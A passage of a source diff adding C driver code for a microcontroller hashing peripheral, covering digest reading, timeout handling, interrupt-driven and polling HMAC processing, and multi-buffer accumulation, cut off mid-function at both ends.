msgdigest += 4U; + *(uint32_t *)(msgdigest) = __REV(HASH_DIGEST->HR[6]); + msgdigest += 4U; + *(uint32_t *)(msgdigest) = __REV(HASH_DIGEST->HR[7]); +#endif /* HASH_CR_MDMAT*/ + break; + default: + break; + } +} + + + +/** + * @brief Handle HASH processing Timeout. + * @param hhash HASH handle. + * @param Flag specifies the HASH flag to check. + * @param Status the Flag status (SET or RESET). + * @param Timeout Timeout duration. + * @retval HAL status + */ +static HAL_StatusTypeDef HASH_WaitOnFlagUntilTimeout(HASH_HandleTypeDef *hhash, uint32_t Flag, FlagStatus Status, + uint32_t Timeout) +{ + uint32_t tickstart = HAL_GetTick(); + + /* Wait until flag is set */ + if (Status == RESET) + { + while (__HAL_HASH_GET_FLAG(Flag) == RESET) + { + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - tickstart) > Timeout) || (Timeout == 0U)) + { + /* Set State to Ready to be able to restart later on */ + hhash->State = HAL_HASH_STATE_READY; + /* Store time out issue in handle status */ + hhash->Status = HAL_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hhash); + + return HAL_TIMEOUT; + } + } + } + } + else + { + while (__HAL_HASH_GET_FLAG(Flag) != RESET) + { + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - tickstart) > Timeout) || (Timeout == 0U)) + { + /* Set State to Ready to be able to restart later on */ + hhash->State = HAL_HASH_STATE_READY; + /* Store time out issue in handle status */ + hhash->Status = HAL_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hhash); + + return HAL_TIMEOUT; + } + } + } + } + return HAL_OK; +} + + +/** + * @brief HASH processing in interruption mode. + * @param hhash HASH handle. + * @note HASH_IT() regularly reads hhash->SuspendRequest to check whether + * or not the HASH processing must be suspended. If this is the case, the + * processing is suspended when possible and the Peripheral feeding point reached at + * suspension time is stored in the handle for resumption later on. + * @retval HAL status + */ +static HAL_StatusTypeDef HASH_IT(HASH_HandleTypeDef *hhash) +{ + if (hhash->State == HAL_HASH_STATE_BUSY) + { + /* ITCounter must not be equal to 0 at this point. Report an error if this is the case. */ + if (hhash->HashITCounter == 0U) + { + /* Disable Interrupts */ + __HAL_HASH_DISABLE_IT(HASH_IT_DINI | HASH_IT_DCI); + /* HASH state set back to Ready to prevent any issue in user code + present in HAL_HASH_ErrorCallback() */ + hhash->State = HAL_HASH_STATE_READY; + return HAL_ERROR; + } + else if (hhash->HashITCounter == 1U) + { + /* This is the first call to HASH_IT, the first input data are about to be + entered in the Peripheral. A specific processing is carried out at this point to + start-up the processing. */ + hhash->HashITCounter = 2U; + } + else + { + /* Cruise speed reached, HashITCounter remains equal to 3 until the end of + the HASH processing or the end of the current step for HMAC processing. */ + hhash->HashITCounter = 3U; + } + + /* If digest is ready */ + if (__HAL_HASH_GET_FLAG(HASH_FLAG_DCIS)) + { + /* Read the digest */ + HASH_GetDigest(hhash->pHashOutBuffPtr, HASH_DIGEST_LENGTH()); + + /* Disable Interrupts */ + __HAL_HASH_DISABLE_IT(HASH_IT_DINI | HASH_IT_DCI); + /* Change the HASH state */ + hhash->State = HAL_HASH_STATE_READY; + /* Reset HASH state machine */ + hhash->Phase = HAL_HASH_PHASE_READY; + /* Call digest computation complete call back */ +#if (USE_HAL_HASH_REGISTER_CALLBACKS == 1) + hhash->DgstCpltCallback(hhash); +#else + HAL_HASH_DgstCpltCallback(hhash); +#endif /* USE_HAL_HASH_REGISTER_CALLBACKS */ + + return HAL_OK; + } + + /* If Peripheral ready to accept new data */ + if (__HAL_HASH_GET_FLAG(HASH_FLAG_DINIS)) + { + + /* If the suspension flag has been raised and if the processing is not about + to end, suspend processing */ + if ((hhash->HashInCount != 0U) && (hhash->SuspendRequest == HAL_HASH_SUSPEND)) + { + /* Disable Interrupts */ + __HAL_HASH_DISABLE_IT(HASH_IT_DINI | HASH_IT_DCI); + + /* Reset SuspendRequest */ + hhash->SuspendRequest = HAL_HASH_SUSPEND_NONE; + + /* Change the HASH state */ + hhash->State = HAL_HASH_STATE_SUSPENDED; + + return HAL_OK; + } + + /* Enter input data in the Peripheral through HASH_Write_Block_Data() call and + check whether the digest calculation has been triggered */ + if (HASH_Write_Block_Data(hhash) == HASH_DIGEST_CALCULATION_STARTED) + { + /* Call Input data transfer complete call back + (called at the end of each step for HMAC) */ +#if (USE_HAL_HASH_REGISTER_CALLBACKS == 1) + hhash->InCpltCallback(hhash); +#else + HAL_HASH_InCpltCallback(hhash); +#endif /* USE_HAL_HASH_REGISTER_CALLBACKS */ + + if (hhash->Phase == HAL_HASH_PHASE_HMAC_STEP_1) + { + /* Wait until Peripheral is not busy anymore */ + if (HASH_WaitOnFlagUntilTimeout(hhash, HASH_FLAG_BUSY, SET, HASH_TIMEOUTVALUE) != HAL_OK) + { + /* Disable Interrupts */ + __HAL_HASH_DISABLE_IT(HASH_IT_DINI | HASH_IT_DCI); + return HAL_TIMEOUT; + } + /* Initialization start for HMAC STEP 2 */ + hhash->Phase = HAL_HASH_PHASE_HMAC_STEP_2; /* Move phase from Step 1 to Step 2 */ + __HAL_HASH_SET_NBVALIDBITS(hhash->HashBuffSize); /* Set NBLW for the input message */ + hhash->HashInCount = hhash->HashBuffSize; /* Set the input data size (in bytes) */ + hhash->pHashInBuffPtr = hhash->pHashMsgBuffPtr; /* Set the input data address */ + hhash->HashITCounter = 1; /* Set ITCounter to 1 to indicate the start + of a new phase */ + __HAL_HASH_ENABLE_IT(HASH_IT_DINI); /* Enable IT (was disabled in HASH_Write_Block_Data) */ + } + else if (hhash->Phase == HAL_HASH_PHASE_HMAC_STEP_2) + { + /* Wait until Peripheral is not busy anymore */ + if (HASH_WaitOnFlagUntilTimeout(hhash, HASH_FLAG_BUSY, SET, HASH_TIMEOUTVALUE) != HAL_OK) + { + /* Disable Interrupts */ + __HAL_HASH_DISABLE_IT(HASH_IT_DINI | HASH_IT_DCI); + return HAL_TIMEOUT; + } + /* Initialization start for HMAC STEP 3 */ + hhash->Phase = HAL_HASH_PHASE_HMAC_STEP_3; /* Move phase from Step 2 to Step 3 */ + __HAL_HASH_SET_NBVALIDBITS(hhash->Init.KeySize); /* Set NBLW for the key */ + hhash->HashInCount = hhash->Init.KeySize; /* Set the key size (in bytes) */ + hhash->pHashInBuffPtr = hhash->Init.pKey; /* Set the key address */ + hhash->HashITCounter = 1; /* Set ITCounter to 1 to indicate the start + of a new phase */ + __HAL_HASH_ENABLE_IT(HASH_IT_DINI); /* Enable IT (was disabled in HASH_Write_Block_Data) */ + } + else + { + /* Nothing to do */ + } + } /* if (HASH_Write_Block_Data(hhash) == HASH_DIGEST_CALCULATION_STARTED) */ + } /* if (__HAL_HASH_GET_FLAG(HASH_FLAG_DINIS))*/ + + /* Return function status */ + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + + +/** + * @brief Write a block of data in HASH Peripheral in interruption mode. + * @param hhash HASH handle. + * @note HASH_Write_Block_Data() is called under interruption by HASH_IT(). + * @retval HAL status + */ +static uint32_t HASH_Write_Block_Data(HASH_HandleTypeDef *hhash) +{ + uint32_t inputaddr; + uint32_t buffercounter; + uint32_t inputcounter; + uint32_t ret = HASH_DIGEST_CALCULATION_NOT_STARTED; + + /* If there are more than 64 bytes remaining to be entered */ + if (hhash->HashInCount > 64U) + { + inputaddr = (uint32_t)hhash->pHashInBuffPtr; + /* Write the Input block in the Data IN register + (16 32-bit words, or 64 bytes are entered) */ + for (buffercounter = 0U; buffercounter < 64U; buffercounter += 4U) + { + HASH->DIN = *(uint32_t *)inputaddr; + inputaddr += 4U; + } + /* If this is the start of input data entering, an additional word + must be entered to start up the HASH processing */ + if (hhash->HashITCounter == 2U) + { + HASH->DIN = *(uint32_t *)inputaddr; + if (hhash->HashInCount >= 68U) + { + /* There are still data waiting to be entered in the Peripheral. + Decrement buffer counter and set pointer to the proper + memory location for the next data entering round. */ + hhash->HashInCount -= 68U; + hhash->pHashInBuffPtr += 68U; + } + else + { + /* All the input buffer has been fed to the HW. */ + hhash->HashInCount = 0U; + } + } + else + { + /* 64 bytes have been entered and there are still some remaining: + Decrement buffer counter and set pointer to the proper + memory location for the next data entering round.*/ + hhash->HashInCount -= 64U; + hhash->pHashInBuffPtr += 64U; + } + } + else + { + /* 64 or less bytes remain to be entered. This is the last + data entering round. */ + + /* Get the buffer address */ + inputaddr = (uint32_t)hhash->pHashInBuffPtr; + /* Get the buffer counter */ + inputcounter = hhash->HashInCount; + /* Disable Interrupts */ + __HAL_HASH_DISABLE_IT(HASH_IT_DINI); + + /* Write the Input block in the Data IN register */ + for (buffercounter = 0U; buffercounter < ((inputcounter + 3U) / 4U); buffercounter++) + { + HASH->DIN = *(uint32_t *)inputaddr; + inputaddr += 4U; + } + + if (hhash->Accumulation == 1U) + { + /* Field accumulation is set, API only feeds data to the Peripheral and under interruption. + The digest computation will be started when the last buffer data are entered. */ + + /* Reset multi buffers accumulation flag */ + hhash->Accumulation = 0U; + /* Change the HASH state */ + hhash->State = HAL_HASH_STATE_READY; + /* Call Input data transfer complete call back */ +#if (USE_HAL_HASH_REGISTER_CALLBACKS == 1) + hhash->InCpltCallback(hhash); +#else + HAL_HASH_InCpltCallback(hhash); +#endif /* USE_HAL_HASH_REGISTER_CALLBACKS */ + } + else + { + /* Start the Digest calculation */ + __HAL_HASH_START_DIGEST(); + /* Return indication that digest calculation has started: + this return value triggers the call to Input data transfer + complete call back as well as the proper transition from + one step to another in HMAC mode. */ + ret = HASH_DIGEST_CALCULATION_STARTED; + } + /* Reset buffer counter */ + hhash->HashInCount = 0; + } + + /* Return whether or digest calculation has started */ + return ret; +} + +/** + * @brief HMAC processing in polling mode. + * @param hhash HASH handle. + * @param Timeout Timeout value. + * @retval HAL status + */ +static HAL_StatusTypeDef HMAC_Processing(HASH_HandleTypeDef *hhash, uint32_t Timeout) +{ + /* Ensure first that Phase is correct */ + if ((hhash->Phase != HAL_HASH_PHASE_HMAC_STEP_1) && (hhash->Phase != HAL_HASH_PHASE_HMAC_STEP_2) + && (hhash->Phase != HAL_HASH_PHASE_HMAC_STEP_3)) + { + /* Change the HASH state */ + hhash->State = HAL_HASH_STATE_READY; + + /* Process Unlock */ + __HAL_UNLOCK(hhash); + + /* Return function status */ + return HAL_ERROR; + } + + /* HMAC Step 1 processing */ + if (hhash->Phase == HAL_HASH_PHASE_HMAC_STEP_1) + { + /************************** STEP 1 ******************************************/ + /* Configure the Number of valid bits in last word of the message */ + __HAL_HASH_SET_NBVALIDBITS(hhash->Init.KeySize); + + /* Write input buffer in Data register */ + hhash->Status = HASH_WriteData(hhash, hhash->pHashKeyBuffPtr, hhash->HashKeyCount); + if (hhash->Status != HAL_OK) + { + return hhash->Status; + } + + /* Check whether or not key entering process has been suspended */ + if (hhash->State == HAL_HASH_STATE_SUSPENDED) + { + /* Process Unlocked */ + __HAL_UNLOCK(hhash); + + /* Stop right there and return function status */ + return HAL_OK; + } + + /* No processing suspension at this point: set DCAL bit. */ + __HAL_HASH_START_DIGEST(); + + /* Wait for BUSY flag to be cleared */ + if (HASH_WaitOnFlagUntilTimeout(hhash, HASH_FLAG_BUSY, SET, Timeout) != HAL_OK) + { + return HAL_TIMEOUT; + } + + /* Move from Step 1 to Step 2 */ + hhash->Phase = HAL_HASH_PHASE_HMAC_STEP_2; + + } + + /* HMAC Step 2 processing. + After phase check, HMAC_Processing() may + - directly start up from this point in resumption case + if the same Step 2 processing was suspended previously + - or fall through from the Step 1 processing carried out hereabove */ + if (hhash->Phase == HAL_HASH_PHASE_HMAC_STEP_2) + { + /************************** STEP 2 ******************************************/ + /* Configure the Number of valid bits in last word of the message */ + __HAL_HASH_SET_NBVALIDBITS(hhash->HashBuffSize); + + /* Write input buffer in Data register */ + hhash->Status = HASH_WriteData(hhash, hhash->pHashInBuffPtr, hhash->HashInCount); + if (hhash->Status != HAL_OK) + { + return hhash->Status; + } + + /* Check whether or not data entering process has been suspended */ + if (hhash->State == HAL_HASH_STATE_SUSPENDED) + { + /* Process Unlocked */ + __HAL_UNLOCK(hhash); + + /* Stop right there and return function status */ + return HAL_OK; + } + + /* No processing suspension at this point: set DCAL bit. */ + __HAL_HASH_START_DIGEST(); + + /* Wait for BUSY flag to be cleared */ + if (HASH_WaitOnFlagUntilTimeout(hhash, HASH_FLAG_BUSY, SET, Timeout) != HAL_OK) + { + return HAL_TIMEOUT; + } + + /* Move from Step 2 to Step 3 */ + hhash->Phase = HAL_HASH_PHASE_HMAC_STEP_3; + /* In case Step 1 phase was suspended then resumed, + set again Key input buffers and size before moving to + next step */ + hhash->pHashKeyBuffPtr = hhash->Init.pKey; + hhash->HashKeyCount = hhash->Init.KeySize; + } + + + /* HMAC Step 3 processing. + After phase check, HMAC_Processing() may + - directly start up from this point in resumption case + if the same Step 3 processing was suspended previously + - or fall through from the Step 2 processing carried out hereabove */ + if (hhash->Phase == HAL_HASH_PHASE_HMAC_STEP_3) + { + /************************** STEP 3 ******************************************/ + /* Configure the Number of valid bits in last word of the message */ + __HAL_HASH_SET_NBVALIDBITS(hhash->Init.KeySize); + + /* Write input buffer in Data register */ + hhash->Status = HASH_WriteData(hhash, hhash->pHashKeyBuffPtr, hhash->HashKeyCount); + if (hhash->Status != HAL_OK) + { + return hhash->Status; + } + + /* Check whether or not key entering process has been suspended */ + if (hhash->State == HAL_HASH_STATE_SUSPENDED) + { + /* Process Unlocked */ + __HAL_UNLOCK(hhash); + + /* Stop right there and return function status */ + return HAL_OK; + } + + /* No processing suspension at this point: start the Digest calculation. */ + __HAL_HASH_START_DIGEST(); + + /* Wait for DCIS flag to be set */ + if (HASH_WaitOnFlagUntilTimeout(hhash, HASH_FLAG_DCIS, RESET, Timeout) != HAL_OK) + { + return HAL_TIMEOUT; + } + + /* Read the message digest */ + HASH_GetDigest(hhash->pHashOutBuffPtr, HASH_DIGEST_LENGTH()); + + /* Reset HASH state machine */ + hhash->Phase = HAL_HASH_PHASE_READY; + } + + /* Change the HASH state */ + hhash->State = HAL_HASH_STATE_READY; + + /* Process Unlock */ + __HAL_UNLOCK(hhash); + + /* Return function status */ + return HAL_OK; +} + + +/** + * @brief Initialize the HASH peripheral, next process pInBuffer then + * read the computed digest. + * @note Digest is available in pOutBuffer. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. + * @param Timeout Timeout value. + * @param Algorithm HASH algorithm. + * @retval HAL status + */ +HAL_StatusTypeDef HASH_Start(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, uint8_t *pOutBuffer, + uint32_t Timeout, uint32_t Algorithm) +{ + uint8_t *pInBuffer_tmp; /* input data address, input parameter of HASH_WriteData() */ + uint32_t Size_tmp; /* input data size (in bytes), input parameter of HASH_WriteData() */ + HAL_HASH_StateTypeDef State_tmp = hhash->State; + + + /* Initiate HASH processing in case of start or resumption */ + if ((State_tmp == HAL_HASH_STATE_READY) || (State_tmp == HAL_HASH_STATE_SUSPENDED)) + { + /* Check input parameters */ + if ((pInBuffer == NULL) || (pOutBuffer == NULL)) + { + hhash->State = HAL_HASH_STATE_READY; + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hhash); + + /* Check if initialization phase has not been already performed */ + if (hhash->Phase == HAL_HASH_PHASE_READY) + { + /* Change the HASH state */ + hhash->State = HAL_HASH_STATE_BUSY; + + /* Select the HASH algorithm, clear HMAC mode and long key selection bit, reset the HASH processor core */ + MODIFY_REG(HASH->CR, HASH_CR_LKEY | HASH_CR_ALGO | HASH_CR_MODE | HASH_CR_INIT, Algorithm | HASH_CR_INIT); + + /* Configure the number of valid bits in last word of the message */ + __HAL_HASH_SET_NBVALIDBITS(Size); + + /* pInBuffer_tmp and Size_tmp are initialized to be used afterwards as + input parameters of HASH_WriteData() */ + pInBuffer_tmp = pInBuffer; /* pInBuffer_tmp is set to the input data address */ + Size_tmp = Size; /* Size_tmp contains the input data size in bytes */ + + /* Set the phase */ + hhash->Phase = HAL_HASH_PHASE_PROCESS; + } + else if (hhash->Phase == HAL_HASH_PHASE_PROCESS) + { + /* if the Peripheral has already been initialized, two cases are possible */ + + /* Process resumption time ... */ + if (hhash->State == HAL_HASH_STATE_SUSPENDED) + { + /* Since this is resumption, pInBuffer_tmp and Size_tmp are not set + to the API input parameters but to those saved beforehand by HASH_WriteData() + when the processing was suspended */ + pInBuffer_tmp = hhash->pHashInBuffPtr; + Size_tmp = hhash->HashInCount; + } + /* ... or multi-buffer HASH processing end */ + else + { + /* pInBuffer_tmp and Size_tmp are initialized to be used afterwards as + input parameters of HASH_WriteData() */ + pInBuffer_tmp = pInBuffer; + Size_tmp = Size; + /* Configure the number of valid bits in last word of the message */ + __HAL_HASH_SET_NBVALIDBITS(Size); + } + /* Change the HASH state */ + hhash->State = HAL_HASH_STATE_BUSY; + } + else + { + /* Phase error */ + hhash->State = HAL_HASH_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hhash); + + /* Return function status */ + return HAL_ERROR; + } + + + /* Write input buffer in Data register */ + hhash->Status = HASH_WriteData(hhash, pInBuffer_tmp, Size_tmp); + if (hhash->Status != HAL_OK) + { + return hhash->Status; + } + + /* If the process has not been suspended, carry on to digest calculation */ + if (hhash->State != HAL_HASH_STATE_SUSPENDED) + { + /* Start the Digest calculation */ + __HAL_HASH_START_DIGEST(); + + /* Wait for DCIS flag to be set */ + if (HASH_WaitOnFlagUntilTimeout(hhash, HASH_FLAG_DCIS, RESET, Timeout) != HAL_OK) + { + return HAL_TIMEOUT; + } + + /* Read the message digest */ + HASH_GetDigest(pOutBuffer, HASH_DIGEST_LENGTH()); + + /* Change the HASH state */ + hhash->State = HAL_HASH_STATE_READY; + + /* Reset HASH state machine */ + hhash->Phase = HAL_HASH_PHASE_READY; + + } + + /* Process Unlocked */ + __HAL_UNLOCK(hhash); + + /* Return function status */ + return HAL_OK; + + } + else + { + return HAL_BUSY; + } +} + + +/** + * @brief If not already done, initialize the HASH peripheral then + * processes pInBuffer. + * @note Field hhash->Phase of HASH handle is tested to check whether or not + * the Peripheral has already been initialized. + * @note The input buffer size (in bytes) must be a multiple of 4 otherwise, the + * HASH digest computation is corrupted. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes, must be a multiple of 4. + * @param Algorithm HASH algorithm. + * @retval HAL status + */ +HAL_StatusTypeDef HASH_Accumulate(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, uint32_t Algorithm) +{ + uint8_t *pInBuffer_tmp; /* input data address, input parameter of HASH_WriteData() */ + uint32_t Size_tmp; /* input data size (in bytes), input parameter of HASH_WriteData() */ + HAL_HASH_StateTypeDef State_tmp = hhash->State; + + /* Make sure the input buffer size (in bytes) is a multiple of 4 */ + if ((Size % 4U) != 0U) + { + return HAL_ERROR; + } + + /* Initiate HASH processing in case of start or resumption */ + if ((State_tmp == HAL_HASH_STATE_READY) || (State_tmp == HAL_HASH_STATE_SUSPENDED)) + { + /* Check input parameters */ + if ((pInBuffer == NULL) || (Size == 0U)) + { + hhash->State = HAL_HASH_STATE_READY; + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hhash); + + /* If resuming the HASH processing */ + if (hhash->State == HAL_HASH_STATE_SUSPENDED) + { + /* Change the HASH state */ + hhash->State = HAL_HASH_STATE_BUSY; + + /* Since this is resumption, pInBuffer_tmp and Size_tmp are not set + to the API input parameters but to those saved beforehand by HASH_WriteData() + when the processing was suspended */ + pInBuffer_tmp = hhash->pHashInBuffPtr; /* pInBuffer_tmp is set to the input data address */ + Size_tmp = hhash->HashInCount; /* Size_tmp contains the input data size in bytes */ + + } + else + { + /* Change the HASH state */ + hhash->State = HAL_HASH_STATE_BUSY; + + /* pInBuffer_tmp and Size_tmp are initialized to be used afterwards as + input parameters of HASH_WriteData() */ + pInBuffer_tmp = pInBuffer; /* pInBuffer_tmp is set to the input data address */ + Size_tmp = Size; /* Size_tmp contains the input data size in bytes */ + + /* Check if initialization phase has already be performed */ + if (hhash->Phase == HAL_HASH_PHASE_READY) + { + /* Select the HASH algorithm, clear HMAC mode and long key selection bit, reset the HASH processor core */ + MODIFY_REG(HASH->CR, HASH_CR_LKEY | HASH_CR_ALGO | HASH_CR_MODE | HASH_CR_INIT, Algorithm | HASH_CR_INIT); + } + + /* Set the phase */ + hhash->Phase = HAL_HASH_PHASE_PROCESS; + + } + + /* Write input buffer in Data register */ + hhash->Status = HASH_WriteData(hhash, pInBuffer_tmp, Size_tmp); + if (hhash->Status != HAL_OK) + { + return hhash->Status; + } + + /* If the process has not been suspended, move the state to Ready */ + if (hhash->State != HAL_HASH_STATE_SUSPENDED) + { + /* Change the HASH state */ + hhash->State = HAL_HASH_STATE_READY; + } + + /* Process Unlocked */ + __HAL_UNLOCK(hhash); + + /* Return function status */ + return HAL_OK; + + } + else + { + return HAL_BUSY; + } + + +} + + +/** + * @brief If not already done, initialize the HASH peripheral then + * processes pInBuffer in interruption mode. + * @note Field hhash->Phase of HASH handle is tested to check whether or not + * the Peripheral has already been initialized. + * @note The input buffer size (in bytes) must be a multiple of 4 otherwise, the + * HASH digest computation is corrupted. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes, must be a multiple of 4. + * @param Algorithm HASH algorithm. + * @retval HAL status + */ +HAL_StatusTypeDef HASH_Accumulate_IT(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, uint32_t Algorithm) +{ + HAL_HASH_StateTypeDef State_tmp = hhash->State; + __IO uint32_t inputaddr = (uint32_t) pInBuffer; + uint32_t SizeVar = Size; + + /* Make sure the input buffer size (in bytes) is a multiple of 4 */ + if ((Size % 4U) != 0U) + { + return HAL_ERROR; + } + + /* Initiate HASH processing in case of start or resumption */ + if ((State_tmp == HAL_HASH_STATE_READY) || (State_tmp == HAL_HASH_STATE_SUSPENDED)) + { + /* Check input parameters */ + if ((pInBuffer == NULL) || (Size == 0U)) + { + hhash->State = HAL_HASH_STATE_READY; + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hhash); + + /* If resuming the HASH processing */ + if (hhash->State == HAL_HASH_STATE_SUSPENDED) + { + /* Change the HASH state */ + hhash->State = HAL_HASH_STATE_BUSY; + } + else + { + /* Change the HASH state */ + hhash->State = HAL_HASH_STATE_BUSY; + + /* Check if initialization phase has already be performed */ + if (hhash->Phase == HAL_HASH_PHASE_READY) + { + /* Select the HASH algorithm, clear HMAC mode and long key selection bit, reset the HASH processor core */ + MODIFY_REG(HASH->CR, HASH_CR_LKEY | HASH_CR_ALGO | HASH_CR_MODE | HASH_CR_INIT, Algorithm | HASH_CR_INIT); + hhash->HashITCounter = 1; + } + else + { + hhash->HashITCounter = 3; /* 'cruise-speed' reached during a previous buffer processing */ + } + + /* Set the phase */ + hhash->Phase = HAL_HASH_PHASE_PROCESS; + + /* If DINIS is equal to 0 (for example if an incomplete block has been previously + fed to the Peripheral), the DINIE interruption won't be triggered when DINIE is set. + Therefore, first words are manually entered until DINIS raises, or until there + is not more data to enter. */ + while ((!(__HAL_HASH_GET_FLAG(HASH_FLAG_DINIS))) && (SizeVar > 0U)) + { + + /* Write input data 4 bytes at a time */ + HASH->DIN = *(uint32_t *)inputaddr; + inputaddr += 4U; + SizeVar -= 4U; + } + + /* If DINIS is still not set or if all the data have been fed, stop here */ + if ((!(__HAL_HASH_GET_FLAG(HASH_FLAG_DINIS))) || (SizeVar == 0U)) + { + /* Change the HASH state */ + hhash->State = HAL_HASH_STATE_READY; + + /* Process Unlock */ + __HAL_UNLOCK(hhash); + + /* Return function status */ + return HAL_OK; + } + + /* otherwise, carry on in interrupt-mode */ + hhash->HashInCount = SizeVar; /* Counter used to keep track of number of data + to be fed to the Peripheral */ + hhash->pHashInBuffPtr = (uint8_t *)inputaddr; /* Points at data which will be fed to the Peripheral at + the next interruption */ + /* In case of suspension, hhash->HashInCount and hhash->pHashInBuffPtr contain + the information describing where the HASH process is stopped. + These variables are used later on to resume the HASH processing at the + correct location. */ + + } + + /* Set multi buffers accumulation flag */ + hhash->Accumulation = 1U; + + /* Process Unlock */ + __HAL_UNLOCK(hhash); + + /* Enable Data Input interrupt */ + __HAL_HASH_ENABLE_IT(HASH_IT_DINI); + + /* Return function status */ + return HAL_OK; + + } + else + { + return HAL_BUSY; + } + +} + + + +/** + * @brief Initialize the HASH peripheral, next process pInBuffer then + * read the computed digest in interruption mode. + * @note Digest is available in pOutBuffer. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. + * @param Algorithm HASH algorithm. + * @retval HAL status + */ +HAL_StatusTypeDef HASH_Start_IT(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, uint8_t *pOutBuffer, + uint32_t Algorithm) +{ + HAL_HASH_StateTypeDef State_tmp = hhash->State; + __IO uint32_t inputaddr = (uint32_t) pInBuffer; + uint32_t polling_step = 0U; + uint32_t initialization_skipped = 0U; + uint32_t SizeVar = Size; + + /* If State is ready or suspended, start or resume IT-based HASH processing */ + if ((State_tmp == HAL_HASH_STATE_READY) || (State_tmp == HAL_HASH_STATE_SUSPENDED)) + { + /* Check input parameters */ + if ((pInBuffer == NULL) || (Size == 0U) || (pOutBuffer == NULL)) + { + hhash->State = HAL_HASH_STATE_READY; + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hhash); + + /* Change the HASH state */ + hhash->State = HAL_HASH_STATE_BUSY; + + /* Initialize IT counter */ + hhash->HashITCounter = 1; + + /* Check if initialization phase has already be performed */ + if (hhash->Phase == HAL_HASH_PHASE_READY) + { + /* Select the HASH algorithm, clear HMAC mode and long key selection bit, reset the HASH processor core */ + MODIFY_REG(HASH->CR, HASH_CR_LKEY | HASH_CR_ALGO | HASH_CR_MODE | HASH_CR_INIT, Algorithm | HASH_CR_INIT); + + /* Configure the number of valid bits in last word of the message */ + __HAL_HASH_SET_NBVALIDBITS(SizeVar); + + + hhash->HashInCount = SizeVar; /* Counter used to keep track of number of data + to be fed to the Peripheral */ + hhash->pHashInBuffPtr = pInBuffer; /* Points at data which will be fed to the Peripheral at + the next interruption */ + /* In case of suspension, hhash->HashInCount and hhash->pHashInBuffPtr contain + the information describing where the HASH process is stopped. + These variables are used later on to resume the HASH processing at the + correct location. */ + + hhash->pHashOutBuffPtr = pOutBuffer; /* Points at the computed digest */ + } + else + { + initialization_skipped = 1; /* info user later on in case of multi-buffer */ + } + + /* Set the phase */ + hhash->Phase = HAL_HASH_PHASE_PROCESS; + + /* If DINIS is equal to 0 (for example if an incomplete block has been previously + fed to the Peripheral), the DINIE interruption won't be triggered when DINIE is set. + Therefore, first words are manually entered until DINIS raises. */ + while ((!(__HAL_HASH_GET_FLAG(HASH_FLAG_DINIS))) && (SizeVar > 3U)) + { + polling_step = 1U; /* note that some words are entered before enabling the interrupt */ + + /* Write input data 4 bytes at a time */ + HASH->DIN = *(uint32_t *)inputaddr; + inputaddr += 4U; + SizeVar -= 4U; + } + + if (polling_step == 1U) + { + if (SizeVar == 0U) + { + /* If all the data have been entered at this point, it only remains to + read the digest */ + hhash->pHashOutBuffPtr = pOutBuffer; /* Points at the computed digest */ + + /* Start the Digest calculation */ + __HAL_HASH_START_DIGEST(); + /* Process Unlock */ + __HAL_UNLOCK(hhash); + + /* Enable Interrupts */ + __HAL_HASH_ENABLE_IT(HASH_IT_DCI); + + /* Return function status */ + return HAL_OK; + } + else if (__HAL_HASH_GET_FLAG(HASH_FLAG_DINIS)) + { + /* It remains data to enter and the Peripheral is ready to trigger DINIE, + carry on as usual. + Update HashInCount and pHashInBuffPtr accordingly. */ + hhash->HashInCount = SizeVar; + hhash->pHashInBuffPtr = (uint8_t *)inputaddr; + __HAL_HASH_SET_NBVALIDBITS( + SizeVar); /* Update the configuration of the number of valid bits in last word of the message */ + hhash->pHashOutBuffPtr = pOutBuffer; /* Points at the computed digest */ + if (initialization_skipped == 1U) + { + hhash->HashITCounter = 3; /* 'cruise-speed' reached during a previous buffer processing */ + } + } + else + { + /* DINIS is not set but it remains a few data to enter (not enough for a full word). + Manually enter the last bytes before enabling DCIE. */ + __HAL_HASH_SET_NBVALIDBITS(SizeVar); + HASH->DIN = *(uint32_t *)inputaddr; + + /* Start the Digest calculation */ + hhash->pHashOutBuffPtr = pOutBuffer; /* Points at the computed digest */ + __HAL_HASH_START_DIGEST(); + /* Process Unlock */ + __HAL_UNLOCK(hhash); + + /* Enable Interrupts */ + __HAL_HASH_ENABLE_IT(HASH_IT_DCI); + + /* Return function status */ + return HAL_OK; + } + } /* if (polling_step == 1) */ + + + /* Process Unlock */ + __HAL_UNLOCK(hhash); + + /* Enable Interrupts */ + __HAL_HASH_ENABLE_IT(HASH_IT_DINI | HASH_IT_DCI); + + /* Return function status */ + return HAL_OK; + } + else + { + return HAL_BUSY; + } + +} + + +/** + * @brief Initialize the HASH peripheral then initiate a DMA transfer + * to feed the input buffer to the Peripheral. + * @note If MDMAT bit is set before calling this function (multi-buffer + * HASH processing case), the input buffer size (in bytes) must be + * a multiple of 4 otherwise, the HASH digest computation is corrupted. + * For the processing of the last buffer of the thread, MDMAT bit must + * be reset and the buffer length (in bytes) doesn't have to be a + * multiple of 4. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param Algorithm HASH algorithm. + * @retval HAL status + */ +HAL_StatusTypeDef HASH_Start_DMA(HASH_HandleTypeDef *hhash, 